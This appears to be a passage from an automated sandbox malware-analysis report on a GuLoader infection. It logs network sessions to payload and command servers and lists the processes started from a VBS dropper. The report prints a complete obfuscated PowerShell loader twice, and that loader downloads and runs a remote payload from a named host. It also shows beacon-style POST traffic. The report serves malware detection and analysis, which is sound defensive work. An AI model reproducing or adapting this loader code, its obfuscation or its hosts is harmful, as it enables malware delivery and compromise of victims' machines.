6 | 192.168.2.7 | 49716 | 193.37.145.73 | 80 | 6256 | C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
Timestamp | Bytes transferred | Direction | Data
Jun 1, 2024 19:59:40.239559889 CEST | 754 | OUT | POST /abt9/ HTTP/1.1
Host: www.beldecor.net
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-us
Origin: http://www.beldecor.net
Referer: http://www.beldecor.net/abt9/
Cache-Control: max-age=0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 240
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Data Raw: 4f 66 35 48 4e 7a 39 3d 5a 38 46 7a 4b 39 2f 47 6d 69 4c 37 30 7a 38 54 53 57 71 45 52 53 4c 55 68 6b 56 74 43 74 6e 48 36 35 61 63 66 6f 32 67 51 73 37 76 64 70 78 58 52 6f 6e 73 4c 61 44 57 37 65 74 64 2b 35 30 61 52 51 77 72 56 56 6b 31 64 51 4e 69 7a 72 6f 6b 51 70 44 61 45 58 41 6f 70 56 48 41 64 2f 51 71 38 7a 36 5a 31 76 6b 33 46 6d 46 74 39 58 56 4b 67 74 43 52 61 72 44 6c 58 36 72 4d 5a 4b 69 48 74 32 6a 65 69 50 6e 4b 68 75 4c 43 67 44 56 30 55 44 55 34 45 6d 65 49 51 51 46 65 30 64 6d 30 77 64 6e 75 42 31 32 6e 6b 6d 59 62 54 72 4c 5a 71 6e 46 62 4d 73 52 41 55 6b 7a 46 68 32 58 61 6a 7a 42 6d 68 76 33 4d 61 4b 71 75 5a 6a 69 45 32 42 74 56 68 44 74 76 78 77 77 50 59 63 48 4d 6e 55 4e 64 78 34 6f 3d
                                                Data Ascii: Of5HNz9=Z8FzK9/GmiL70z8TSWqERSLUhkVtCtnH65acfo2gQs7vdpxXRonsLaDW7etd+50aRQwrVVk1dQNizrokQpDaEXAopVHAd/Qq8z6Z1vk3FmFt9XVKgtCRarDlX6rMZKiHt2jeiPnKhuLCgDV0UDU4EmeIQQFe0dm0wdnuB12nkmYbTrLZqnFbMsRAUkzFh2XajzBmhv3MaKquZjiE2BtVhDtvxwwPYcHMnUNdx4o=
Jun 1, 2024 19:59:41.053061008 CEST | 1046 | IN | HTTP/1.1 404 Not Found
Date: Sat, 01 Jun 2024 17:59:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Content-Encoding: gzip


                                                Session ID: 7 | Source IP: 192.168.2.7 | Source Port: 49717 | Destination IP: 193.37.145.73 | Destination Port: 80 | PID: 6256 | Process: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jun 1, 2024 19:59:42.770765066 CEST | 1767 | OUT | POST /abt9/ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.beldecor.net
                                                Referer: http://www.beldecor.net/abt9/
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Content-Length: 1252
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Jun 1, 2024 19:59:43.597502947 CEST | 1045 | IN | HTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:43 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Content-Encoding: gzip


                                                Session ID: 8 | Source IP: 192.168.2.7 | Source Port: 49718 | Destination IP: 193.37.145.73 | Destination Port: 80 | PID: 6256 | Process: C:\Program Files (x86)\inKjrEeJPqrLFNOWzGWorIUhMdJgcKADyUVzTIeqJiwbzVgZKvLgDppI\dczsDTwoOAPdxoSvtjazysDUwNBh.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                Jun 1, 2024 19:59:45.301719904 CEST | 468 | OUT | GET /abt9/?Of5HNz9=U+tTJKHHkznvwAdOTVuKaX3FkVtJQL73z6Knbsq9f/vaKulnAbb7PLKV5/tS55IHZlIFY34dfjld794ib/iuaW0ctDHRV5MOwCy1+9JCA1F7uH49s/OETdfla7HVUoCSmFvZju33t//s&HvxX=KFLDJ HTTP/1.1
                                                Host: www.beldecor.net
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                Jun 1, 2024 19:59:46.116954088 CEST | 1236 | IN | HTTP/1.1 404 Not Found
                                                Date: Sat, 01 Jun 2024 17:59:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Accept-Ranges: bytes
                                                Data Ascii: 5f9<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.beldecor.net | Powered by www.lws.fr | ID: a2afa7cf04bf03aafb1b763300764289</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own erro [TRUNCATED]
                                                Jun 1, 2024 19:59:46.116990089 CEST | 457 | IN | Data Ascii: nd switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround
                                                Jun 1, 2024 19:59:46.120230913 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session ID: 0 | Source IP: 192.168.2.7 | Source Port: 49700 | Destination IP: 188.215.50.154 | Destination Port: 443 | PID: 6600 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-06-01 17:57:42 UTC | 170 | OUT | GET /Rutschebanes.qxd HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: ramirex.ro
                                                Connection: Keep-Alive
                                                2024-06-01 17:57:42 UTC | 365 | IN | HTTP/1.1 200 OK
                                                Date: Sat, 01 Jun 2024 17:57:42 GMT
                                                Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                                                Last-Modified: Sun, 26 May 2024 15:12:56 GMT
                                                ETag: "26600d4-66eac-6195cd5e836f3"
                                                Accept-Ranges: bytes
                                                Content-Length: 421548
                                                Connection: close
                                                Content-Type: application/vnd.quark.quarkxpress


                                                Session ID: 1 | Source IP: 192.168.2.7 | Source Port: 49707 | Destination IP: 188.215.50.154 | Destination Port: 443 | PID: 7992 | Process: C:\Program Files (x86)\Windows Mail\wab.exe
                                                Timestamp | Bytes transferred | Direction | Data
                                                2024-06-01 17:58:17 UTC | 179 | OUT | GET /HtwvlcDSFcrAhhcHdD97.bin HTTP/1.1
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                Host: ramirex.ro
                                                Cache-Control: no-cache
                                                2024-06-01 17:58:18 UTC | 356 | IN | HTTP/1.1 200 OK
                                                Date: Sat, 01 Jun 2024 17:58:18 GMT
                                                Server: Apache/2.2.34 (Unix) mod_ssl/2.2.34 OpenSSL/1.0.1e-fips mod_bwlimited/1.4 mod_qos/11.5 mod_fcgid/2.3.9
                                                Last-Modified: Sun, 26 May 2024 15:08:50 GMT
                                                ETag: "266009d-41e40-6195cc739c2e3"
                                                Accept-Ranges: bytes
                                                Content-Length: 269888
                                                Connection: close
                                                Content-Type: application/octet-stream
                                                Data Ascii: cE8x)J{St9ybIBS&"2TuNx$-_9_1e]J{zqfZ%cHM3RYY)7on$! x`H%SGFv;p'6U+DVxxflmH3bymxQO67BldqKNuO|h_,7%3Y3|h


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG-466573885783553Folketingsmedlemmers.vbs"
                                                Imagebase:0x7ff6abcf0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                                                Imagebase:0x7ff741d30000
                                                File size:452'608 bytes
                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000002.00000002.1892792593.00000206255D3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:13:57:37
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff75da10000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:5
                                                Start time:13:57:39
                                                Start date:01/06/2024
                                                Path:C:\Windows\System32\cmd.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Metacarpals.Tok && echo t"
                                                Imagebase:0x7ff70be40000
                                                File size:289'792 bytes
                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:14
                                                Start time:13:57:47
                                                Start date:01/06/2024
                                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Radiosender='Sub';$Radiosender+='strin';$Knnest = 1;$Radiosender+='g';Function Beshout($Solurenes){$Strejftogters=$Solurenes.Length-$Knnest;For($Overskringers=5;$Overskringers -lt $Strejftogters;$Overskringers+=6){$Neodadaism+=$Solurenes.$Radiosender.Invoke( $Overskringers, $Knnest);}$Neodadaism;}function Lovbundnes($Yttria){ . ($Afskalningernes) ($Yttria);}$Piggy=Beshout 'MrtelM Kr.dotcknozOversi .alil.angslI traa Woma/Hjemm5Ustem.Battl0Byudv Fr,g( ndeWHaandiSkrannTankrdForgroAdvokwAtropsPiske Pne mNpandoT.tuts bane1 dap0 Copy.Sei.m0 Nyre;Procu ,ropWPr,exifleyenmonta6Dou l4 Dri,;S bco TorvexUafvr6Kooke4Rep.e;Ensur AfrakrtingsvEcaud:.rtho1Tele,2Micro1,punk.Dvelr0compl)Duboi UnameG .dskeFreskcdesidkForumoS.fte/Rd,pr2Kbenh0Indre1Topvi0Vaag.0Charl1Batho0Rever1Aureg encodF Bel iDvrgtrBastieK,ydsfIndlgohemicxsigna/ac,ep1 odvi2.jalt1vandf.Hulen0,ates ';$Formaliaers=Beshout 'fugtpUSkiljs.ippeeSlivorKnobk-GldesANonirgCoxiee Lag nIdenttPo.ku ';$Gem=Beshout 'Opadgh ValgtDivertcountpFortssRigm.:Be,po/vr.ss/NeoterMetheaPyramm Borti ZikkrManyreFunktx,awmi.Foredr Treso Afpu/antirRTradeu.omatt.seudsIndevcGimpmhast,re No.fbLkk,raFyrstndokhmeRecresR leg.ZabraqJustuxMidvedMinco ';$Morsomhedernes78=Beshout ' Pli.>Bemr, ';$Afskalningernes=Beshout 'Cou,tiBombaeFor,lx,obbe ';$Uniformerne='Requisites';$Generaliserede135 = Beshout 'Mn treSildecDynamhFremfo Herr Shri%Udrk a F,nspSyc.ppPasswdBadesaKok etBro,eaNedry%Stand\Skan,MBal.ie Preft istaaKrngecBidraaKlororSeashpBe hiaUlulalIleossPloto.FordoTFoto oSea akRepre Rumfr&.ltfo&Proce ViolieSeer,cInterh tdfaoT,lst Pomatt Flle ';Lovbundnes (Beshout 'Manip$NetstgDuromlCountoDeathbSalgsaStor.lSuper:AlloyBB nbrlSpe.la Linif Oketf Pro,eHals,rSydvee Kla.nAtlas=Rangl(BrokkcMal,kmAcftsdErrat Polit/GiantcDesm. 
usdy$B kagGPer.eeUro.tn fleteczardrPretea VaerlBuff,i KorpsFinureBre.srLderveSloucdR.gnbeBando1Ordna3 I,el5Fre,s) Bowl ');Lovbundnes (Beshout 'Kilde$ VaaggHumoul trusoCom,ebPagurakritelBynrt:TorsoMSkibsa derasGuimpsCentiaSenagcSuctirForhaeemmagd Cade= Amor$CardiG AvlseAcidbmChr.s.DronnsSmaltpLevnel ChariChinctBurme( Goni$BowldM.angeoS,mmer issisSterooS,vermProfihFanemeBeggadDrakme Xemer.erienextraeKonomsS.per7 amle8Verde)Kaf,e ');$Gem=$Massacred[0];$Benzyls= (Beshout ' Four$Brn gg D ggl RokaoCoarcbH.ndgaSamlel.ilgo: ReflG DispeAmar n AvereIoretr opt,iHoos c Mi daAfkrflUnderlPorceyHyper= .estNSortle RatgwSlhun-SinliO RacebDaabsjHalsseStandc lokbt .yra TilbaS Dolpyu.sprsKvag tTri,ee ResimBashe.EllarNChemie.yskutTriam.prevoW,nisoeko orbDisedCChevel routi.rende orinnBalitt');$Benzyls+=$Blafferen[1];Lovbundnes ($Benzyls);Lovbundnes (Beshout '.esen$AkuleGStratePneumn paceebe olrJut.si carmcBe.tya JnanlEmbr lTerraySjamb.FyrsvH ,evie nfela U lndH.ctoeAnteprKon asLevne[Tilst$ ,nseFBellioUnderr Ravem,reagaKo,iflOverdiTerkeaFreshe Unr r Cra.sAmour]Forch=Tvely$Ko edPCountiForstgAbonng TordyTroll ');$Clamourers=Beshout ' tran$ LiniGmaskieamphinled meOph lrGlutti ,inicActivaUrinelRis,klyngliy .uto.LerkrDForkaoEme.owUnd.rn Behol Refoo PansaAtrordLge.rFesta,iRachel ColoeAd,rd( eral$,ogerGquadreHypocmTambu,Svovl$ ,symF V,mao Psykd AuspbUddeloDayfll iksedKhiraoSexfir BistgoptraaSlutrnKnoldiSplejsHippoa Venet ManniUafheo UnexnMinoreti sfrNdudgn OpmaeAp.ea)Bea,b ';$Fodboldorganisationerne=$Blafferen[0];Lovbundnes (Beshout 'Konce$EntergBeentlNonsuo FjelbSpuilaMulenlCirro: b gyN.rozaopolarnKotelokn.fic MaricB yaniSwi,ddAdditeAcadenVekset Min a Wi tl.ernelSelvsyMorai1Smrsy7 M ta2S.ill=P vot( OkseT PolyeTyr,fsImpedtCoten-PowerPTr.lda,orblt ,rdihSphac Bhmis$Se.erFSnag,oRettedLagerbUdr.goRef rlFanfadCattioSkomarDivu.g Pai,aHydronDatasi Ov rs,admoaKentatBrudliFjernoCou,tnB,ddeeBakeprKendenIndise St.m)Corne ');while (!$Nonoccidentally172) {Lovbundnes (Beshout ',runs$Skol gMicmal reado 
S,otbKlokkaReprol Scra:VendevMondnamodtarSto ai iscoaT,nktbThornl daarep intrAlternUnboheSkarns Glu.=Uniqu$UnbeatG adur,ompluSrtrye Jet, ') ;Lovbundnes $Clamourers;Lovbundnes (Beshout 'InfraS.outttRmn naunderr Su,ptImper-J wryS.oneulStrate Abase.npicpSalg, rabl4.pise ');Lovbundnes (Beshout ' Rain$SemisgoutbulInveio,onoubFarinaCo,kelMar o:RigerNDobbeo FortnKoldboJuicecH xesc Cau iWhackd BocaeBehaanFredst,glina Oct.lSlavel P.ogyVaske1Lived7Milie2 Kend=Afpri(Eff,kTBotcheOsmans notitNonno-OverfP Amarad.vintUnconh skov Bid $ faksFTorveoHydradAars bFeltmoFuli.lFantad Pisto,pilirImpi gGen,eaLi.ninSto,ei,ncepsCommea Bj rtCafe i NordoAdmednTilsteHenvirspra,n De.oeBarun)Alter ') ;Lovbundnes (Beshout ' Stea$FirblgGlycelRaadsospindbSyc naUnapol tult:Umy,dsInd,spA logoE.sprrBetlutfersksPlas.f TraniU ilas acitkBld re .omorAce onCounteMindssSkndi=Legif$TudengL nollBr aroWeanebImpowa utorletche:BohunG Squ r recoiRenu.z Icht1 prog8 .hut0Spoof+cereb+Colum% .ril$BarghMAntr.aSku.dsBespesXenylaDitlecufuldrUnf,leUnb.odEpisc.For,rcM,casoagerduSpankn Su.etRigge ') ;$Gem=$Massacred[$sportsfiskernes];}$Sycophant=286850;$Fanhouse=29309;Lovbundnes (Beshout 'Quadr$FlunkgNonv.lDejlio BikobOutseaFolkllDe pa:SkabeBKor,te ScothSwe.eaOctarnPresadLem rlstr,jiFuppenKarstgRanglsTun,sf kop oe.iserPreanmtriun ,abat=upwra CombG.raileneddmtP.yba-Fal.oC A.buosne,nnBrutttDiss eLaparn CorntAkti. 
Outb $SinceF sonnoServidForstbOpt.goBaandlAn icdMagneoSy.aprNonp.gToposaCiaren Ochei S,nds e,tia Pantt FormiAdmonoAfklan ickseSiamerAnnlin Oliee Koll ');Lovbundnes (Beshout 'Seama$CountgCooeelJagghoS,nerb DiblaSocialTe,mo:ParceEAnvenmCrammbProreoSecresUd aaoGadetmPome Spe i=Acyli Gospe[Il.ndSHaardyButiksTeazltRingteTostimCygn,.AutofCScorpoD span ephav,jforeBedarrUitsptMarti]sp.ne:Rumpi:skndeFD,mner,olypoUdbu,m nkkB .icoaDampbsA,stieMn,mo6istem4br.epS Alrut AfsprUltraiG.dsknUnautgGendr(Reinl$ KamfB Yleteskolah Zamba,ammonAnnlidAttacl TlleiTanksn DonogFe.ins,llenfSta,lo D bbrPh,nom.awky)Vrdis ');Lovbundnes (Beshout 'unspr$Stratg SnarlUenigoAttribPrvetaDiabolIntur:BarocBExtrauFarv,l Trm.dPalaerCounteMidaitMalle Palis= Unco Atro[SkabiS amleyL,ggisTit ltMakuleV nermEskim. co nTVan,ueLungsxBastitUintj.CouteEE,ternUrbancProgro Shedd ,arii MisrnRetoagNemat]Fibro:Cup,u:ColorALu,skSSvbesCT.metIKbestIDorge.L,gerGSkif,eAfba,tBaldaSAtomkt RegirAkkomiEksamnFantagNibbl(Sju,k$Uove,EInspem.levabYulboo CreasBremsoFlammmAspha)Tro b ');Lovbundnes (Beshout 'Broth$Pippeg BesplPioneoUdsteb chooa tagnlStrop:GrangBA.grerLithoeExpatvgispeiHoerecTurk,aObstru AlbudHy roaGui,i2Rhaps=Bredb$BasepBUnderu alalNonend Solir WhizeLevirtPen.a. Forss.dminuU,idebOpkalsFdekltKredsr F,rpirvesknImpr.g,mfor(S,dni$ GendSK.areyYngstc S naoGnubbpreverhInsena CathnraaditInsen,Be,vr$ColosFHe,ira,oknenNst.ihNestloReeleut.anss Fo.eePredi) ongu ');Lovbundnes $Brevicauda2;"
                                                Imagebase:0x2b0000
                                                File size:433'152 bytes
                                                MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 0000000E.00000002.1660236750.00000000086F0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
